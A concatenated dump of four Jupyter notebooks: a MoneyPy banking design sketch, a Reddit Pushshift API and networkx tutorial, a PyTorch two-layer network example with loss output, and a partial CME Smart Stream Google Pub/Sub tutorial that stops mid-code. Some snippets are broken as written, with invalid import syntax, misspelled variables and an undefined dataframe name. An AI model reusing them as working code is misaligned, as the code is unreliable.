8239059944810bf658ffa0664b2a83bdd640c8fa
[ "MIT" ]
null
null
null
examples/userstory_1.ipynb
bajor/MoneyPy
8239059944810bf658ffa0664b2a83bdd640c8fa
[ "MIT" ]
null
null
null
examples/userstory_1.ipynb
bajor/MoneyPy
8239059944810bf658ffa0664b2a83bdd640c8fa
[ "MIT" ]
null
null
null
22.992366
163
0.574369
[ [ [ "import moneypy", "_____no_output_____" ], [ "#specify the databse to use\ndb = moneypy.select_db('./my_banking.db')\n# moneypy.select_last_db()", "_____no_output_____" ], [ "# Load and view existing data\ndb.as_frame().head(10) # Return a pandas dataframe. As_frame should allow to specify what you want to load from the db to avoid loading huge files in memory ", "_____no_output_____" ], [ "# Load new data from a csv file\nnew_data = moneypy.from_csv('./my_banking_files.csv')\nnew_data.summarize() # Print how many entries, how many entries are unlabeled, ...", "_____no_output_____" ], [ "lablers = moneypy.get_default_lablers(db) # Get all label filter that are configured for a certain db\n\nimport MyLabler from mylablers # Import a custom labler, the user has written him/herself\n\nlablers.append(MyLabler)\nlabeled_data = new_data.label(MyLabler) # Add label and category automatically\n\nlabeled_data.head()", "_____no_output_____" ], [ "# Save the new data in the db\ndb.store(labeled_data) # Save the data and (somehow check if the entries already exist)\n\ndb.as_frame().head(10) # Show the new values loaded from the database", "_____no_output_____" ], [ "# get all entries related to food\nfood_filter = monepy.RegexFilter('category', '^food$')\nfood_entrys = food_filter.apply(db)", "_____no_output_____" ], [ "food_entys.plot.piechart('recipient') # create a piechart showing how much of your food money you have spend where", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1f0b6bb26f172df788d533380a1a405b8c6d3f
11,736
ipynb
Jupyter Notebook
05_Reddit_Pushshift_API.ipynb
mizvol/GraphMining-TheWebConf2021
faed0e1aa181dc05f8eeee67fedf34ae73f428af
[ "MIT" ]
null
null
null
05_Reddit_Pushshift_API.ipynb
mizvol/GraphMining-TheWebConf2021
faed0e1aa181dc05f8eeee67fedf34ae73f428af
[ "MIT" ]
null
null
null
05_Reddit_Pushshift_API.ipynb
mizvol/GraphMining-TheWebConf2021
faed0e1aa181dc05f8eeee67fedf34ae73f428af
[ "MIT" ]
null
null
null
31.804878
378
0.576602
[ [ [ "# Exploring Reddit with the pushshift API\nThis notebook give you examples of how to use the pushshift API for querying Reddit data.\n\n* Pushshift doc: https://github.com/pushshift/api\n* FAQ about Pushshift: https://www.reddit.com/r/pushshift/comments/bcxguf/new_to_pushshift_read_this_faq/", "_____no_output_____" ] ], [ [ "import requests\nimport pandas as pd", "_____no_output_____" ] ], [ [ "We define a convenient function to get data from Pushshift:", "_____no_output_____" ] ], [ [ "def get_pushshift_data(data_type, params):\n \"\"\"\n Gets data from the pushshift api.\n \n data_type can be 'comment' or 'submission'\n The rest of the args are interpreted as payload.\n \n Read more: https://github.com/pushshift/api\n \n This function is inspired from:\n https://www.jcchouinard.com/how-to-use-reddit-api-with-python/\n \"\"\"\n \n base_url = f\"https://api.pushshift.io/reddit/search/{data_type}/\"\n request = requests.get(base_url, params=params)\n print('Query:')\n print(request.url)\n try: \n data = request.json().get(\"data\")\n except:\n print('--- Request failed ---')\n data = []\n return data\n", "_____no_output_____" ] ], [ [ "This function accepts the parameters of the pushshift API detailed in the doc at https://github.com/pushshift/api. An example is given below.", "_____no_output_____" ], [ "## Example of request to the API\nLet us collect the comments written in the last 2 day in the subreddit `askscience`. The number of results returned is limited to 100, the upper limit of the API.", "_____no_output_____" ] ], [ [ "# parameters for the pushshift API\ndata_type = \"comment\" # accept \"comment\" or \"submission\", search in comments or submissions\nparams = {\n \"subreddit\" : \"askscience\", # limit to one or a list of subreddit(s)\n \"after\" : \"2d\", # Select the timeframe. Epoch value or Integer + \"s,m,h,d\" (i.e. \"second\", \"minute\", \"hour\", \"day\")\n \"size\" : 100, # Number of results to return (limited to max 100 in the API)\n \"author\" : \"![deleted]\" # limit to a list of authors or ignore authors with a \"!\" mark in front\n}\n# Note: the option \"aggs\" (aggregate) has been de-activated in the API\n\ndata = get_pushshift_data(data_type, params)\ndf = pd.DataFrame.from_records(data)\nprint('Some of the data returned:')\ndf[['author', 'subreddit', 'score', 'created_utc', 'body']].head()", "_____no_output_____" ] ], [ [ "## Authors of comments\nLet us collect the authors of comments in a subreddit during the last days. The next function helps bypassing the limit of results by sending queries multiple times, avoiding collecting duplicate authors.", "_____no_output_____" ] ], [ [ "# Get the list of unique authors of comments in the API results\n# bypass the limit of 100 results by sending multiple queries\ndef get_unique_authors(n_results, params):\n results_per_request = 100 # default nb of results per query\n n_queries = n_results // results_per_request + 1\n author_list = []\n author_neg_list = [\"![deleted]\"]\n for query in range(n_queries):\n params[\"author\"] = author_neg_list\n data = get_pushshift_data(data_type=\"comment\", params=params)\n df = pd.DataFrame.from_records(data)\n if df.empty:\n return author_list\n authors = list(df['author'].unique())\n # add ! mark\n authors_neg = [\"!\"+ a for a in authors]\n author_list += authors\n author_neg_list += authors_neg\n return author_list", "_____no_output_____" ], [ "# Ask for the authors of comments in the last days, colect at least \"n_results\"\nsubreddit = \"askscience\"\ndata_type = \"comment\"\nparams = {\n \"subreddit\" : subreddit,\n \"after\" : \"2d\"\n}\nn_results = 500\nauthor_list = get_unique_authors(n_results, params)\nprint(\"Number of authors:\",len(author_list))", "_____no_output_____" ], [ "# Collect the subreddits where the authors wrote comments and the number of comments\nfrom collections import Counter\ndata_type = \"comment\"\nparams = {\n \"size\" : 100\n}\nsubreddits_count = Counter()\nfor author in author_list:\n params[\"author\"] = author\n print(params[\"author\"])\n data = get_pushshift_data(data_type=data_type, params=params)\n if data: # in case the resquest failed and data is empty\n df = pd.DataFrame.from_records(data)\n subreddits_count += Counter(dict(df['subreddit'].value_counts()))", "_____no_output_____" ] ], [ [ "## Network of subreddits (ego-graph)\nLet us build the ego-graph of the subreddit. Other subreddits will be connected to the main one if the users commented in the other subreddits as well.", "_____no_output_____" ] ], [ [ "# module for networks\nimport networkx as nx", "_____no_output_____" ], [ "threshold = 0.05\nG = nx.Graph()\nG.add_node(subreddit)\nself_refs = subreddits_count[subreddit]\nfor sub,value in subreddits_count.items():\n post_ratio = value/self_refs\n if post_ratio >= threshold:\n G.add_edge(subreddit,sub, weight=post_ratio)\nprint(\"Total number of edges in the graph:\",G.number_of_edges())", "_____no_output_____" ] ], [ [ "Here is an alternative way of generating the graph using pandas dataframes instead of a for loop (it might scale better on bigger graphs).", "_____no_output_____" ] ], [ [ "threshold = 0.05\nsubreddits_count_df = pd.DataFrame.from_dict(subreddits_count, orient='index', columns=['total'])\nsubreddits_ratio_df = subreddits_count_df/subreddits_count_df.loc[subreddit]\nsubreddits_ratio_df.rename(columns={'total': 'weight'}, inplace=True)\nfiltered_sr_df = subreddit_ratio_df[subreddits_ratio_df['weight'] >= threshold].copy() # filter weights < threshold\nfiltered_sr_df['source'] = subreddit\nfiltered_sr_df['target'] = filtered_sr_df.index\nGdf = nx.from_pandas_edgelist(filtered_sr_df, source='source', target='target', edge_attr=True)\nprint(\"Total number of edges in the graph:\",Gdf.number_of_edges())", "_____no_output_____" ], [ "# Write the graph to a file\npath = 'egograph.gexf'\nnx.write_gexf(G,path)", "_____no_output_____" ] ], [ [ "## Network of subreddit neighbors\nThis second collection makes a distinction between the related subreddits. For each author, all the subreddits where he/she commented will be connected together. The weight of each connection will be proportional to the number of users commenting in both subreddits joined by the connection. The ego-graph becomes an approximate neighbor network for the central subreddit.", "_____no_output_____" ] ], [ [ "data_type = \"comment\"\nparams = {\n \"size\" : 100\n}\ncount_list = []\nfor author in author_list:\n params[\"author\"] = author\n print(params[\"author\"])\n data = get_pushshift_data(data_type=data_type, params=params)\n if data:\n df = pd.DataFrame.from_records(data)\n count_list.append(Counter(dict(df['subreddit'].value_counts())))", "_____no_output_____" ], [ "import itertools\nthreshold = 0.05\nG = nx.Graph()\n\nfor author_sub_count in count_list:\n sub_list = author_sub_count.most_common(10)\n # Compute all the combinations of subreddit pairs\n sub_combinations = list(itertools.combinations(sub_list, 2))\n for sub_pair in sub_combinations:\n node1 = sub_pair[0][0]\n node2 = sub_pair[1][0]\n if G.has_edge(node1, node2):\n G[node1][node2]['weight'] +=1\n else:\n G.add_edge(node1, node2, weight=1)\nprint(\"Total number of edges {}, and nodes {}\".format(G.number_of_edges(),G.number_of_nodes()))", "_____no_output_____" ], [ "# Sparsify the graph\nto_remove = [edge for edge in G.edges.data() if edge[2]['weight'] < 2]\nG.remove_edges_from(to_remove)", "_____no_output_____" ], [ "# Remove isolated nodes\nG.remove_nodes_from(list(nx.isolates(G)))\nprint(\"Total number of edges {}, and nodes {}\".format(G.number_of_edges(),G.number_of_nodes()))", "_____no_output_____" ], [ "# Write the graph to a file\npath = 'graph.gexf'\nnx.write_gexf(G,path)", "_____no_output_____" ] ], [ [ "An example of the graph visualization you can obtain using Gephi:\n![Reddit neighbors](figures/redditneighbors.png \"Reddit neighbors\")", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ] ]
cb1f1410472a52a82b6bad193bcb577c5f4266d1
20,566
ipynb
Jupyter Notebook
examples/2_two_layer_net_tensor.ipynb
spencerpomme/torchlight
254a461b30436ac23e64d5ce59e43a1672b76304
[ "MIT" ]
null
null
null
examples/2_two_layer_net_tensor.ipynb
spencerpomme/torchlight
254a461b30436ac23e64d5ce59e43a1672b76304
[ "MIT" ]
null
null
null
examples/2_two_layer_net_tensor.ipynb
spencerpomme/torchlight
254a461b30436ac23e64d5ce59e43a1672b76304
[ "MIT" ]
null
null
null
32.748408
87
0.603666
[ [ [ "%matplotlib inline", "_____no_output_____" ] ], [ [ "\nPyTorch: Tensors\n----------------\n\nA fully-connected ReLU network with one hidden layer and no biases, trained to\npredict y from x by minimizing squared Euclidean distance.\n\nThis implementation uses PyTorch tensors to manually compute the forward pass,\nloss, and backward pass.\n\nA PyTorch Tensor is basically the same as a numpy array: it does not know\nanything about deep learning or computational graphs or gradients, and is just\na generic n-dimensional array to be used for arbitrary numeric computation.\n\nThe biggest difference between a numpy array and a PyTorch Tensor is that\na PyTorch Tensor can run on either CPU or GPU. To run operations on the GPU,\njust cast the Tensor to a cuda datatype.\n\n", "_____no_output_____" ] ], [ [ "import torch\n\n\ndtype = torch.float\n# device = torch.device(\"cpu\")\ndevice = torch.device(\"cuda:1\") # Uncomment this to run on GPU\n\n# N is batch size; D_in is input dimension;\n# H is hidden dimension; D_out is output dimension.\nN, D_in, H, D_out = 64, 1000, 100, 10\n\n# Create random input and output data\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\n\n# Randomly initialize weights\nw1 = torch.randn(D_in, H, device=device, dtype=dtype)\nw2 = torch.randn(H, D_out, device=device, dtype=dtype)\n\nlearning_rate = 1e-6\nfor t in range(500):\n # Forward pass: compute predicted y\n h = x.mm(w1)\n h_relu = h.clamp(min=0)\n y_pred = h_relu.mm(w2)\n\n # Compute and print loss\n loss = (y_pred - y).pow(2).sum().item()\n print(t, loss)\n\n # Backprop to compute gradients of w1 and w2 with respect to loss\n grad_y_pred = 2.0 * (y_pred - y)\n grad_w2 = h_relu.t().mm(grad_y_pred)\n grad_h_relu = grad_y_pred.mm(w2.t())\n grad_h = grad_h_relu.clone()\n grad_h[h < 0] = 0\n grad_w1 = x.t().mm(grad_h)\n\n # Update weights using gradient descent\n w1 -= learning_rate * grad_w1\n w2 -= learning_rate * grad_w2", "0 29266960.0\n1 25477014.0\n2 27260208.0\n3 30241428.0\n4 30207164.0\n5 25019268.0\n6 16550626.0\n7 9194384.0\n8 4705195.0\n9 2503613.25\n10 1491022.125\n11 1013848.625\n12 764834.1875\n13 615944.9375\n14 514465.5625\n15 438525.125\n16 378407.875\n17 329093.71875\n18 287852.5\n19 252939.140625\n20 223106.5625\n21 197447.125\n22 175266.234375\n23 156014.3125\n24 139235.984375\n25 124555.3046875\n26 111688.09375\n27 100362.8203125\n28 90364.3828125\n29 81518.0703125\n30 73668.6640625\n31 66682.203125\n32 60449.52734375\n33 54883.21875\n34 49919.86328125\n35 45471.68359375\n36 41476.265625\n37 37879.41796875\n38 34634.4921875\n39 31704.412109375\n40 29053.955078125\n41 26653.27734375\n42 24475.0546875\n43 22497.203125\n44 20697.529296875\n45 19058.849609375\n46 17564.28515625\n47 16199.8564453125\n48 14952.7568359375\n49 13811.7900390625\n50 12768.75\n51 11813.8359375\n52 10937.40625\n53 10133.0517578125\n54 9393.5966796875\n55 8713.83984375\n56 8088.37890625\n57 7512.13037109375\n58 6980.56298828125\n59 6490.02099609375\n60 6037.01953125\n61 5618.40673828125\n62 5231.27001953125\n63 4872.9853515625\n64 4541.41748046875\n65 4234.21142578125\n66 3949.36328125\n67 3685.106201171875\n68 3439.8984375\n69 3212.32421875\n70 3000.765869140625\n71 2804.21484375\n72 2621.385498046875\n73 2451.32763671875\n74 2293.015625\n75 2145.6962890625\n76 2008.356689453125\n77 1880.4254150390625\n78 1761.308837890625\n79 1650.2481689453125\n80 1546.6138916015625\n81 1449.8695068359375\n82 1359.50732421875\n83 1275.093505859375\n84 1196.241455078125\n85 1122.532958984375\n86 1053.6015625\n87 989.1404418945312\n88 928.8567504882812\n89 872.4309692382812\n90 819.725830078125\n91 770.4022827148438\n92 724.1859130859375\n93 680.8786010742188\n94 640.46484375\n95 602.6685791015625\n96 567.0758056640625\n97 533.6875\n98 502.3617858886719\n99 472.951416015625\n100 445.34490966796875\n101 419.4388427734375\n102 395.09442138671875\n103 372.2297058105469\n104 350.7359313964844\n105 330.5293273925781\n106 311.5328369140625\n107 293.66888427734375\n108 276.87176513671875\n109 261.0761413574219\n110 246.21310424804688\n111 232.2200469970703\n112 219.05177307128906\n113 206.65748596191406\n114 194.98643493652344\n115 183.99728393554688\n116 173.64747619628906\n117 163.89939880371094\n118 154.7146453857422\n119 146.0586395263672\n120 137.90000915527344\n121 130.21266174316406\n122 122.96631622314453\n123 116.13368225097656\n124 109.68746948242188\n125 103.61166381835938\n126 97.88236999511719\n127 92.476318359375\n128 87.3749771118164\n129 82.5643539428711\n130 78.02483367919922\n131 73.7400131225586\n132 69.69677734375\n133 65.87850952148438\n134 62.27714920043945\n135 58.875938415527344\n136 55.664085388183594\n137 52.62968826293945\n138 49.76548767089844\n139 47.059688568115234\n140 44.50413513183594\n141 42.089237213134766\n142 39.809329986572266\n143 37.65499496459961\n144 35.61928939819336\n145 33.69534683227539\n146 31.8774471282959\n147 30.1589412689209\n148 28.534767150878906\n149 26.999094009399414\n150 25.547992706298828\n151 24.17645835876465\n152 22.878679275512695\n153 21.6523494720459\n154 20.492351531982422\n155 19.396503448486328\n156 18.359289169311523\n157 17.378162384033203\n158 16.450359344482422\n159 15.573212623596191\n160 14.74298095703125\n161 13.957356452941895\n162 13.214544296264648\n163 12.511799812316895\n164 11.846867561340332\n165 11.217629432678223\n166 10.622474670410156\n167 10.059125900268555\n168 9.525788307189941\n169 9.020942687988281\n170 8.543808937072754\n171 8.092021942138672\n172 7.664194107055664\n173 7.259500026702881\n174 6.875890254974365\n175 6.513085842132568\n176 6.169560432434082\n177 5.8443403244018555\n178 5.536559581756592\n179 5.24492073059082\n180 4.969001770019531\n181 4.707659721374512\n182 4.460142135620117\n183 4.225909233093262\n184 4.0037922859191895\n185 3.793743371963501\n186 3.5948028564453125\n187 3.406233787536621\n188 3.227598190307617\n189 3.0585086345672607\n190 2.898372173309326\n191 2.7465741634368896\n192 2.602959394454956\n193 2.4669559001922607\n194 2.3379757404327393\n195 2.215773344039917\n196 2.100053310394287\n197 1.9904696941375732\n198 1.8865892887115479\n199 1.7882546186447144\n200 1.695005178451538\n201 1.6066385507583618\n202 1.5228453874588013\n203 1.4434927701950073\n204 1.3684048652648926\n205 1.2971372604370117\n206 1.2296861410140991\n207 1.1657618284225464\n208 1.105137825012207\n209 1.0476728677749634\n210 0.9932741522789001\n211 0.941645085811615\n212 0.892839252948761\n213 0.846431314945221\n214 0.8025403618812561\n215 0.7609297037124634\n216 0.7215125560760498\n217 0.6840711236000061\n218 0.648654043674469\n219 0.6150773167610168\n220 0.5832456350326538\n221 0.55304354429245\n222 0.5245211124420166\n223 0.4973125159740448\n224 0.4715929329395294\n225 0.44722479581832886\n226 0.4240991473197937\n227 0.40219539403915405\n228 0.38142096996307373\n229 0.36171936988830566\n230 0.3430108428001404\n231 0.3253297209739685\n232 0.30852600932121277\n233 0.2926216721534729\n234 0.27752187848091125\n235 0.2632429301738739\n236 0.24966855347156525\n237 0.2367924302816391\n238 0.22461438179016113\n239 0.21302594244480133\n240 0.20204897224903107\n241 0.19163306057453156\n242 0.18175019323825836\n243 0.172406867146492\n244 0.16356034576892853\n245 0.15515084564685822\n246 0.1471465826034546\n247 0.1396118700504303\n248 0.13244648277759552\n249 0.1256207376718521\n250 0.11918986588716507\n251 0.11302562803030014\n252 0.10725656896829605\n253 0.1017390638589859\n254 0.09650200605392456\n255 0.09155023097991943\n256 0.08687949180603027\n257 0.0824190080165863\n258 0.07820267975330353\n259 0.07418745756149292\n260 0.07036960124969482\n261 0.06678572297096252\n262 0.06335032731294632\n263 0.06009756773710251\n264 0.05702150613069534\n265 0.054098691791296005\n266 0.051327455788850784\n267 0.04871796816587448\n268 0.046210967004299164\n269 0.04384228587150574\n270 0.041607365012168884\n271 0.03949473053216934\n272 0.037473712116479874\n273 0.03556383401155472\n274 0.03375692293047905\n275 0.0320359542965889\n276 0.030400017276406288\n277 0.028846219182014465\n278 0.027368761599063873\n279 0.02596612647175789\n280 0.02464558742940426\n281 0.023396531119942665\n282 0.02220619097352028\n283 0.021082840859889984\n284 0.020008249208331108\n285 0.019000621512532234\n286 0.018032224848866463\n287 0.017121292650699615\n288 0.01625545509159565\n289 0.015439102426171303\n290 0.014669670723378658\n291 0.013926206156611443\n292 0.013228174299001694\n293 0.012565471231937408\n294 0.011927930638194084\n295 0.011333256959915161\n296 0.010762959718704224\n297 0.01022363267838955\n298 0.009720949456095695\n299 0.009237916208803654\n300 0.008771172724664211\n301 0.008342628367245197\n302 0.007930171675980091\n303 0.007536838762462139\n304 0.007156833074986935\n305 0.006807477213442326\n306 0.006474659778177738\n307 0.0061616175808012486\n308 0.005859468597918749\n309 0.005571956746280193\n310 0.005303850397467613\n311 0.005046273581683636\n312 0.004799655172973871\n313 0.004568567965179682\n314 0.004350310657173395\n315 0.00414681201800704\n316 0.003948734141886234\n317 0.0037640647497028112\n318 0.003585121361538768\n319 0.003417747560888529\n320 0.0032601284328848124\n321 0.0031060499604791403\n322 0.0029574956279248\n323 0.0028222317341715097\n324 0.0026964107528328896\n325 0.0025758754927664995\n326 0.002460675546899438\n327 0.0023473091423511505\n328 0.0022438950836658478\n329 0.002144365105777979\n330 0.002051248447969556\n331 0.001959338551387191\n332 0.0018745583947747946\n333 0.001796040334738791\n334 0.0017189307836815715\n335 0.0016471147537231445\n336 0.0015768555458635092\n337 0.0015089459484443069\n338 0.0014475068310275674\n339 0.0013895906740799546\n340 0.001331732957623899\n341 0.001278553856536746\n342 0.0012277018977329135\n343 0.0011764800874516368\n344 0.0011307267704978585\n345 0.0010872433194890618\n346 0.0010442468337714672\n347 0.0010029466357082129\n348 0.0009660141658969223\n349 0.000928566325455904\n350 0.0008933362551033497\n351 0.0008606849005445838\n352 0.0008287448436021805\n353 0.0007973524043336511\n354 0.0007683560252189636\n355 0.0007408586097881198\n356 0.0007147397845983505\n357 0.0006891388329677284\n358 0.0006650270079262555\n359 0.000641675665974617\n360 0.0006192573928274214\n361 0.000596818164922297\n362 0.0005777495680376887\n363 0.0005584603641182184\n364 0.0005398028297349811\n365 0.00052195432363078\n366 0.0005045364378020167\n367 0.00048882479313761\n368 0.0004734347457997501\n369 0.0004580653621815145\n370 0.0004429766268003732\n371 0.00042865893919952214\n372 0.0004152814217377454\n373 0.00040220972732640803\n374 0.00039035061490722\n375 0.0003786215092986822\n376 0.00036682700738310814\n377 0.00035631877835839987\n378 0.0003456560370977968\n379 0.00033554129186086357\n380 0.00032579494290985167\n381 0.0003155771119054407\n382 0.0003062051546294242\n" ] ] ]
[ "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code" ] ]
cb1f1cd76ebcaea7d9bf98d89b6b0d1ddd98b90e
18,719
ipynb
Jupyter Notebook
Tutorials/GooglePubSubGetCMEBinaryData.ipynb
CMEGroup/CMESmartStream-on-GCP-Tutorial
ab7019ce7405956a96d9cb427a8a40193829ca56
[ "BSD-3-Clause" ]
6
2021-01-21T20:25:58.000Z
2021-12-27T09:25:10.000Z
Tutorials/GooglePubSubGetCMEBinaryData.ipynb
algo88/CMESmartStream-on-GCP-Tutorial
ab7019ce7405956a96d9cb427a8a40193829ca56
[ "BSD-3-Clause" ]
1
2020-09-14T16:16:32.000Z
2020-09-14T16:16:32.000Z
Tutorials/GooglePubSubGetCMEBinaryData.ipynb
algo88/CMESmartStream-on-GCP-Tutorial
ab7019ce7405956a96d9cb427a8a40193829ca56
[ "BSD-3-Clause" ]
2
2021-02-27T01:40:10.000Z
2021-04-04T12:20:23.000Z
40.871179
499
0.643945
[ [ [ "# CME Smart Stream on Google Cloud Platform Tutorials\n## Getting CME Binary Data from CME Smart Stream on Google Cloud Platform (GCP)\n\nThis workbook demonstrates the ability to quickly use the CME Smart Stream on GCP solution. Through the examples, we will \n- Authenticate using GCP IAM information\n- Configure which CME Smart Stream on GCP Topic containing the Market Data \n- Download a single message from your Cloud Pub/Sub Subscription\n- Delete your Cloud Pub/Sub Subscription\n\nThe following example references the following webpage to pull the information:\n\nhttps://www.cmegroup.com/confluence/display/EPICSANDBOX/CME+Smart+Stream+GCP+Topic+Names\n\n\nAuthor: Aaron Walters (Github: @aaronwalters79). \nOS: MacOS", "_____no_output_____" ] ], [ [ "#import packages. These are outlined in the environment.ymal file as part of this project.\n#these can also be directly imported. \n\n# Google SDK: https://cloud.google.com/sdk/docs/quickstarts\n# Google PubSub: https://cloud.google.com/pubsub/docs/reference/libraries\n\nfrom google.cloud import pubsub_v1\nimport os\nimport google.auth\n\n", "_____no_output_____" ] ], [ [ "# Authentication using Google IAM\n\nCME Smart Stream uses Google Cloud native Idenity and Accesss Management (IAM) solutions. Using this approach, customers are able to natively access CME Smart Stream solution without custom SDK's or authentication routines. All the code in this workboard is native Google Python SDK. While the Google Pub/Sub examples below are using python, there are native SDK's for other popular languages including Java, C#, Node.js, PHP, and others.\n\nTo download those libraries, please see the following location: https://cloud.google.com/pubsub/docs/reference/libraries\n\n\nWhen onboarding to CME Smart Stream, you will supply at least one Google IAM Member accounts. https://cloud.google.com/iam/docs/overview. When accessing CME Smart Stream Topics, you will use the same IAM account infromation to create your Subscription using navative GCP authenticaion routines within the GCP SDK. \n\nThe following authentication routines below use either a Service Account or User Account. Google highly recomends using an Service Account with associated authorization json. This document also contains authentication via User Account in the event you requested CME to use User Account for access. You only need to use one of these for the example.\n\n", "_____no_output_____" ], [ "## Authentication Routine for Service Account \nThis section is for customers using Service Accounts. You should update the './gcp-auth.json' to reference your local authorization json file downloaded from google. \n\nFurther documentation is located here: https://cloud.google.com/docs/authentication/getting-started ", "_____no_output_____" ] ], [ [ "## Authentication Method Options -- SERVICE ACCOUNT JSON FILE\n# This should point to the file location of the json file downloaded from GCP console. This will load it into your os variables and be automtically leverage when your system interacts with GCP.\n\n#os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = \"./gcp-auth.json\" #Uncomment if using this method.\n\n", "_____no_output_____" ] ], [ [ "## Authentication for User Account\n\nThis section is for customers that registered thier GCP User Account (i.e. [email protected]). This routine will launch the OS SDK to authenticate you as that user and then set it as your default credentials for the rest of the workflow when interacting with GCP. \n\nIN OS TERMINAL: 'gcloud auth application-default login' without quotes.", "_____no_output_____" ] ], [ [ "## Authentication Method User Machine Defaults\n#\n#Run \"gcloud auth login\" in command line and login as the user. The code below will do that automatically. \n#It should laucnh a browser to authenticate into GCP that user name and associated permissions will be used in the remaining of the code below\n\n# This code will put out a warning about using end user credentials.\n# Reference: https://google-auth.readthedocs.io/en/latest/user-guide.html\n\n\ncredentials, project = google.auth.default()", "/anaconda3/envs/python3/lib/python3.7/site-packages/google/auth/_default.py:66: UserWarning: Your application has authenticated using end user credentials from Google Cloud SDK. We recommend that most server applications use service accounts instead. If your application continues to use end user credentials from Cloud SDK, you might receive a \"quota exceeded\" or \"API not enabled\" error. For more information about service accounts, see https://cloud.google.com/docs/authentication/\n warnings.warn(_CLOUD_SDK_CREDENTIALS_WARNING)\n" ] ], [ [ "# Set Your Smart Stream on GCP Projects and Topics\n", "_____no_output_____" ], [ "\n## Set CME Smart Stream Project \n\nCME Smart Stream on GCP data is avaliable in two GCP Projects based upon Production and Non-Production (i.e. certification and new release) data. Customers are granted access to projects through the onboarding process. \n\nThe example below sets the target CME Smart Stream on GCP Project as an OS variable for easy reference.\n", "_____no_output_____" ] ], [ [ "#This is the project at CME \nos.environ['GOOGLE_CLOUD_PROJECT_CME'] = \"cmegroup-marketdata-newrel\" #CERT and NEW RELEASE\n#os.environ['GOOGLE_CLOUD_PROJECT_CME'] = \"cmegroup-marketdata\" #PRODUCTION", "_____no_output_____" ] ], [ [ "## Set CME Smart Stream Topics\n\nCME Smart Stream on GCP follows the traditional data segmentation of the CME Multicast solution. \n\nEach channel on Multicast is avaliable as a Topic in Google Cloud PubSub. This workbook will create 1 subscription in the customer's account against 1 Topic from the CME project. Clearly, customers can script this to create as many subscriptions as needed. \n\nPlease see: https://www.cmegroup.com/confluence/display/EPICSANDBOX/CME+Smart+Stream+GCP+Topic+Names for all the topic names. \n\nYou can also review the notebook included in this git project named Google PubSub Get CME Topics on how to read the names from the website into a local CSV file or use in automated scripts.", "_____no_output_____" ] ], [ [ "# The CME TOPIC that a Subscription will be created against\nos.environ['GOOGLE_CLOUD_TOPIC_CME'] = \"CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\" #CERT\n#s.environ['GOOGLE_CLOUD_TOPIC_CME'] = \"NR.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\" #NEW RELEASE\n#os.environ['GOOGLE_CLOUD_TOPIC_CME'] = \"CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\" #PRODUCTION \n\n", "_____no_output_____" ] ], [ [ "# Set Customer Configurations", "_____no_output_____" ], [ "## Set Customer Project & Subscription Name\n\nSmart Stream on GCP solution requires that the customer create a Cloud Pub/Sub Subscription in thier account. This subscription will automatically collect data from the CME Smart Stream Pub/Sub Topic. Since the Subscriptin is in the customer account we must specify the customer GCP Project and the name of the Subscription they want in the project. \n\nIn the example below, we set the project directly based upon our GCP project name. We also create a subscription name by prepending 'MY_' to the name of the Topic we are joining. \n", "_____no_output_____" ] ], [ [ "#Your Configurations for the project you want to have access; \n#will use the defaults from credentials \nos.environ['GOOGLE_CLOUD_PROJECT'] = \"prefab-rampart-794\"\n\n#My Subscipription Name -- Take the CME Topic Name and prepend 'MY_' -- Can be any thing the customer wants\nos.environ['MY_SUBSCRIPTION_NAME'] = 'MY_'+os.environ['GOOGLE_CLOUD_TOPIC_CME'] #MY SUBSCRIPTION NAME", "_____no_output_____" ] ], [ [ "# Final Configuration\n\nThe following is the final configuration for your setup.", "_____no_output_____" ] ], [ [ "\nprint ('Target Project: \\t',os.environ['GOOGLE_CLOUD_PROJECT_CME'] )\nprint ('Target Topic: \\t\\t', os.environ['GOOGLE_CLOUD_TOPIC_CME'] , '\\n' )\nprint ('My Project: \\t\\t',os.environ['GOOGLE_CLOUD_PROJECT'])\nprint ('My Subscriptions: \\t',os.environ['MY_SUBSCRIPTION_NAME'] )", "Target Project: \t cmegroup-marketdata-newrel\nTarget Topic: \t\t CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310 \n\nMy Project: \t\t prefab-rampart-794\nMy Subscriptions: \t MY_CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\n" ] ], [ [ "# Create Your Subscription to CME Smart Stream Data Topics\nWe have all the main variables set and can pass them to the Cloud Pub/Sub Python SDK. The following attempts to create a Subscription (MY_SUBSCRIPTION_NAME) in your specified project (GOOGLE_CLOUD_PROJECT) that points to the CME Topic (GOOGLE_CLOUD_TOPIC_CME) and Project (GOOGLE_CLOUD_PROJECT_CME) of that Topic.\n\nOnce created or determined it already exists we will join our python session to the Subscription as 'subscriber'. \n\nFull documentation on this Pub/Sub example is avaliable: https://googleapis.github.io/google-cloud-python/latest/pubsub/#subscribing\n", "_____no_output_____" ] ], [ [ "#https://googleapis.github.io/google-cloud-python/latest/pubsub/#subscribing\n\n\n#Create Topic Name from Config Above\ntopic_name = 'projects/{cme_project_id}/topics/{cme_topic}'.format( cme_project_id=os.getenv('GOOGLE_CLOUD_PROJECT_CME'), cme_topic=os.getenv('GOOGLE_CLOUD_TOPIC_CME'), )\n\n#Create Subscription Name from Config Above\nsubscription_name = 'projects/{my_project_id}/subscriptions/{my_sub}'.format(my_project_id=os.getenv('GOOGLE_CLOUD_PROJECT'),my_sub=os.environ['MY_SUBSCRIPTION_NAME'], )\n\n#Try To Create a subscription in your Project\nsubscriber = pubsub_v1.SubscriberClient(credentials=credentials)\ntry:\n subscriber.create_subscription(\n name=subscription_name, \n topic=topic_name,\n ack_deadline_seconds=60, #This limits the likelihood google will redeliver a recieved message, default 